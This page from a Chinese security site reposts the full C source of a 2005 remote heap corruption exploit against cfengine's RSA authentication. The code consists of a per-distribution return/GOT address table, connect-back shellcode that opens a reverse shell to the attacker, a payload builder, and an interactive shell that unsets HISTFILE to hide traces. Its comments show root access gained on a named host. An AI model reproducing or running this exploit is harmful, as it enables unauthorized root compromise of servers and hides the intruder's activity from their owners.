首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Cfengine RSA Authentication Remote Heap Corruption Exploit
来源:http://exworm.hostrocket.com 作者:jsk 发布时间:2005-02-21  

Cfengine RSA Authentication Remote Heap Corruption Exploit

/* _ ________ _____ ______
*
* cfengine rsa heap remote exploit part of PTjob project / \ / "fuck mm"
* by jsk:exworm(http://exworm.hostrocket.com) \/
* bug found by core
* yep ta mei dayong ..hehe..so pub it..
* my home: www.ph4nt0m.org
* GT: emm.oyxin.seal.ava.haggis.b_root.more..
* No girl No money No jop...
* bash-2.05b# ./cf_0day -t 1 -h 192.168.31.23
* cfengine rsa heap remote exploit ....s
* --------------------------------------------------(need money.to..fk..girl..)
* [+] lisntener...
* [+] Connected, sending code...
* [+] Ret: 0x0819f03e
* [+] Got: 0x0811a590
* [+] ownedbyOseen!
* -----------------------------------------------------------
* Linux ns2.autson.com 2.4.18-3 #1 Thu Apr 18 07:37:53 EDT 2002 i686 unknown
* uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10
*(wheel)
*
*
*/

#include <stdio.h>
#include <stdarg.h>
#include <stdlib.h>
#include <netdb.h>
#include <net/if.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <getopt.h>
#include <unistd.h>
#include <string.h>
#include <arpa/inet.h>
#include <errno.h>
#include <linux/sockios.h>

#define BUF 1024


struct {
char *distro;
char *type;
unsigned long ret;
unsigned long got;

} targets[] = { /*got is free of rsafree() ,get it by yourself to own more machine
;) */
{ "Redhat 7.3 ", "cfengine 2.1.7p1 ",0x0819f03e , 0x0811a590 },
{ "redhat 9.0 ", "cfengine 2.1.7p1", **********, ********** }, ( hehe:use
fast-bin tips)
{ "Redhat 7.2 ", "cfengine 2.17p1 ", 0x080d1c78, 0x0806d0e3 },
{ "Redhat 7.1 ", "cfengine 2.17p1", 0x080d11e0, 0x082bc090 },
{ "Crash ", "(All platforms) ", 0x42424242, 0x41414141 },
};
char linux_connect_back[] = /* connect back 45295 */
"\x31\xc0\x31\xdb\x31\xc9\x51\xb1"
"\x06\x51\xb1\x01\x51\xb1\x02\x51"
"\x89\xe1\xb3\x01\xb0\x66\xcd\x80"
"\x89\xc2\x31\xc0\x31\xc9\x51\x51"
"\x68\x41\x42\x43\x44\x66\x68\xb0"
"\xef\xb1\x02\x66\x51\x89\xe7\xb3"
"\x10\x53\x57\x52\x89\xe1\xb3\x03"
"\xb0\x66\xcd\x80\x31\xc9\x39\xc1"
"\x74\x06\x31\xc0\xb0\x01\xcd\x80"
"\x31\xc0\xb0\x3f\x89\xd3\xcd\x80"
"\x31\xc0\xb0\x3f\x89\xd3\xb1\x01"
"\xcd\x80\x31\xc0\xb0\x3f\x89\xd3"
"\xb1\x02\xcd\x80\x31\xc0\x31\xd2"
"\x50\x68\x6e\x2f\x73\x68\x68\x2f"
"\x2f\x62\x69\x89\xe3\x50\x53\x89"
"\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0"
"\x01\xcd\x80";
int sock;
void usage();
void shell();


void
usage(char *prog)
{

fprintf(stderr,"Usage: %s -t [-pah]\n",prog);
fprintf(stderr,"-t version Linux version.\n");
fprintf(stderr,"-h target The host to attack.\n");
fprintf(stderr,"-a password Default password is \"sorry no password. \".\n");
fprintf(stderr,"-p port Default port is 5803.\n\n");
}

int
openhost(char *host,int port)
{
struct sockaddr_in addr;
struct hostent *he;

he=gethostbyname(host);

if (he==NULL) return -1;
sock=socket(AF_INET, SOCK_STREAM, getprotobyname("tcp")->p_proto);
if (sock==-1) return -1;

memcpy(&addr.sin_addr, he->h_addr, he->h_length);

addr.sin_family=AF_INET;
addr.sin_port=htons(port);

if(connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1)
sock=-1;
return sock;
}


void
shell(int sock)
{
fd_set fd_read;
char buff[1024], *cmd="unset HISTFILE; /bin/uname -a;/usr/bin/id; echo '***
oseen are chinese...'\n";
int n;

FD_ZERO(&fd_read);
FD_SET(sock, &fd_read);
FD_SET(0, &fd_read);

send(sock, cmd, strlen(cmd), 0);

while(1) {
FD_SET(sock, &fd_read);
FD_SET(0, &fd_read);

if (select(sock+1, &fd_read, NULL, NULL, NULL) < 0) break;

if (FD_ISSET(sock, &fd_read)) {
if ((n = recv(sock, buff, sizeof(buff), 0)) < 0){
fprintf(stderr, "[+] EOF\n");
exit(2);
}

if (write(1, buff, n) <0) break;
}

if (FD_ISSET(0, &fd_read)) {
if ((n = read(0, buff, sizeof(buff))) < 0){
fprintf(stderr,"[+] EOF\n");
exit(2);
}

if (send(sock, buff, n, 0) < 0) break;
}
}

fprintf(stderr,"[+] Connection lost.\n\n");
exit(0);
}

unsigned char
*get_my_ip_addr(int sockfd, struct ifreq *ifr)
{
struct sockaddr_in sin;
char *b = (char *) malloc(4);

if (ioctl(sockfd ,SIOCGIFADDR,ifr) < 0) {
fprintf(stderr, "Unable to get the local IP Address, use -d.\n");

exit(1);
}

memcpy(&sin, &ifr->ifr_addr, sizeof(struct sockaddr_in));
memcpy(b, (char *) &sin.sin_addr.s_addr, 4);
return b;
}

int
main (int argc,char *argv[])
{
char buf1[512];
char buf2[512];
char host[256];
char pass[256]="changeme";
char data;

int type= 0;
int c=0;
int port=8001;
char device[256] = "eth0";
unsigned char *ptr;

struct hostent *hp;
struct sockaddr_in sin_listener;
struct ifreq ifr;
struct timeval timeout;

fd_set fdread;

int delay = 12;
int i = 0;
int mode = 0;
int local_port = 0;
int opt = 0;
int ret = 0;
int sin_len = sizeof (struct sockaddr_in);
int sock = 0;
int sock2 = 0;
int sockd = 0;
int listener = 0;
int time_out = 4;
int tmp = 0;

srand(getpid());

fprintf(stdout,"cfengine rsa heap remote exploit ....s\n");
fprintf(stdout,"--------------------------------------------------(need money.to..fk..girl..)\n");

while((c=getopt(argc,argv,"h:p:a:t:")) !=EOF)
{
switch(c)
{
case 'p':
port=atoi(optarg);
if ((port <= 0) || (port > 65535)) {
fprintf(stderr,"Invalid port.\n\n");
exit(1);
}
break;
case 'a':
memset(pass,0x0,sizeof(pass));
strncpy(pass,optarg,sizeof(pass) - 1);
break;
case 't':
type = atoi(optarg);
if (type == 0 || type > sizeof(targets) / 28) {
for(i = 0; i < sizeof(targets) / 28; i++)
fprintf(stderr, "%02d. %s - %s [0x%08x
- 0x%08x]\n",
i + 1, targets[i].distro, targets[i].type,
targets[i].ret, targets[i].got);
return -1;
}
break;
case 'h':
memset(host,0x0,sizeof(host));
strncpy(host,optarg,sizeof(host) - 1);
break;

default:
usage(argv[0]);
exit(1);
break;
}
}

timeout.tv_sec = time_out;
timeout.tv_usec = 0;

if (strlen(host) == 0) {
usage(argv[0]);
exit(1);
}
sock=openhost(host, 5308);

if (sock==-1) {
fprintf(stderr,"- Unable to connect.\n\n");
exit(1);
}

strncpy(ifr.ifr_name, device, 15);

if ((sockd = socket(AF_INET, SOCK_DGRAM, 17)) < 0) {
fprintf(stderr, "socket() error.\n");
return -1;
}

if ((listener = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
fprintf(stderr, "socket() error.\n");
return -1;
}

ptr = get_my_ip_addr(sockd, &ifr);
memcpy(&sin_listener.sin_addr.s_addr, ptr, 4);

sin_listener.sin_family = AF_INET;
memset(&sin_listener.sin_zero, 0x00, 8);

while(1) {
local_port = local_port = 45295;
sin_listener.sin_port = htons(local_port);
if (!bind(listener, (struct sockaddr *) &sin_listener, sin_len)) break;
}

listen(listener, 1);
fprintf(stdout, "[+] lisntener...\n");
linux_connect_back[33] = (unsigned int) *(ptr + 0);
linux_connect_back[34] = (unsigned int) *(ptr + 1);
linux_connect_back[35] = (unsigned int) *(ptr + 2);
linux_connect_back[36] = (unsigned int) *(ptr + 3);

memset(buf2, 0x0, sizeof(buf2));
memset(buf1, 0x90, sizeof(buf1));

for(i=0;i < strlen(linux_connect_back); i++) buf1[i+50] = linux_connect_back[i];

buf1[0] = (0x41414141 & 0x000000ff);
buf1[1] = (0x41414141 & 0x0000ff00) >> 8;
buf1[2] = (0x41414141 & 0x00ff0000) >> 16;
buf1[3] = (0x41414141 & 0xff000000) >> 24;

buf1[4] = (0x58585858 & 0x000000ff);
buf1[5] = (0x58585858 & 0x0000ff00) >> 8;
buf1[6] = (0x58585858 & 0x00ff0000) >> 16;
buf1[7] = (0x58585858 & 0xff000000) >> 24;

buf1[8] = (0xfffffffc & 0x000000ff);
buf1[9] = (0xfffffffc & 0x0000ff00) >> 8;
buf1[10] = (0xfffffffc & 0x00ff0000) >> 16;
buf1[11] = (0xfffffffc & 0xff000000) >> 24;

buf1[12] = (0xffffffff & 0x000000ff);
buf1[13] = (0xffffffff & 0x0000ff00) >> 8;
buf1[14] = (0xffffffff & 0x00ff0000) >> 16;
buf1[15] = (0xffffffff & 0xff000000) >> 24;

buf1[16] = (targets[type - 1].got -12 & 0x000000ff);
buf1[17] = (targets[type - 1].got -12 & 0x0000ff00) >> 8;
buf1[18] = (targets[type - 1].got -12 & 0x00ff0000) >> 16;
buf1[19] = (targets[type - 1].got -12 & 0xff000000) >> 24;

buf1[20] = (targets[type - 1].ret & 0x000000ff);
buf1[21] = (targets[type - 1].ret & 0x0000ff00) >> 8;
buf1[22] = (targets[type - 1].ret & 0x00ff0000) >> 16;
buf1[23] = (targets[type - 1].ret & 0xff000000) >> 24;


for(i = 0; i < 300 - sizeof(linux_connect_back) -80; i+=2)
{
buf1[i + 24] = 0x7f;
buf1[i + 25] = 0xeb;
}
for(; i < 300 - sizeof(linux_connect_back) - 1; i++)
buf1[i + 24] = 0x90;
strcpy(buf1 + i + 24, linux_connect_back);
buf1[i + 24+ sizeof(linux_connect_back) - 1] = '\n';
buf1[i + 25 + sizeof(linux_connect_back) - 1] = '\0';

sprintf(buf2, "k0000023CAUTH HARE KRISHNA HAREk0003000SAUTH n00000010 00001000%s\r\n",
buf1);

fprintf(stdout, "Connected, sending code...\n");
fprintf(stdout, "[+] Ret: 0x%08x\n", targets[type - 1].ret);
fprintf(stdout, "[+] Got: 0x%08x\n", targets[type - 1].got);
while(1) {
write(sock, buf2, strlen(buf2));
close(sock);
sleep(2);
FD_ZERO(&fdread);
FD_SET(listener, &fdread);

timeout.tv_sec = time_out;
timeout.tv_usec = 0;

while(1) {

ret = select(FD_SETSIZE, &fdread, NULL, NULL, &timeout);

if (ret < 0) {
close(sock);
close(listener);
fprintf(stderr, "select() error.\n");
return -1;
}

if (ret == 0) {
fprintf(stderr, "[+] Failed, waiting %d seconds.\n"
"[+] Use ctrl-c to abort.\n", delay);
sleep(delay);
break;
}

if(FD_ISSET(listener, &fdread)) {
sock2 = accept(listener, (struct sockaddr *)&sin_listener, &sin_len);
close(sock);
close(listener);

fprintf(stderr, "[+] ownedbyOseen!\n"
"-----------------------------------------------------------\n");
shell(sock2);
close(sock2);
return 0;
}
}

}

fprintf(stderr, "[+] Exploit failed.\n");
close(listener);
close(sock);
return 0;

}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Thomson TCW690 POST Password V
·Nullsoft SHOUTcast v1.9.4 remo
·DelphiTurk CodeBank 3.1 Local
·Arkeia Backup Client Remote Ac
·DelphiTurk e-Posta v1.0 Local
·SHOUTcast DNAS/Linux v1.9.4 fo
·3com 3CDaemon FTP Unauthorized
·Nullsoft SHOUTcast v1.9.4 remo
·Medal of Honor Spearhead Dedic
·Linux Vulnerability Allows Non
·Typespeed Proof of Concept Loc
·Knox Arkeia Server Backup Stac
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved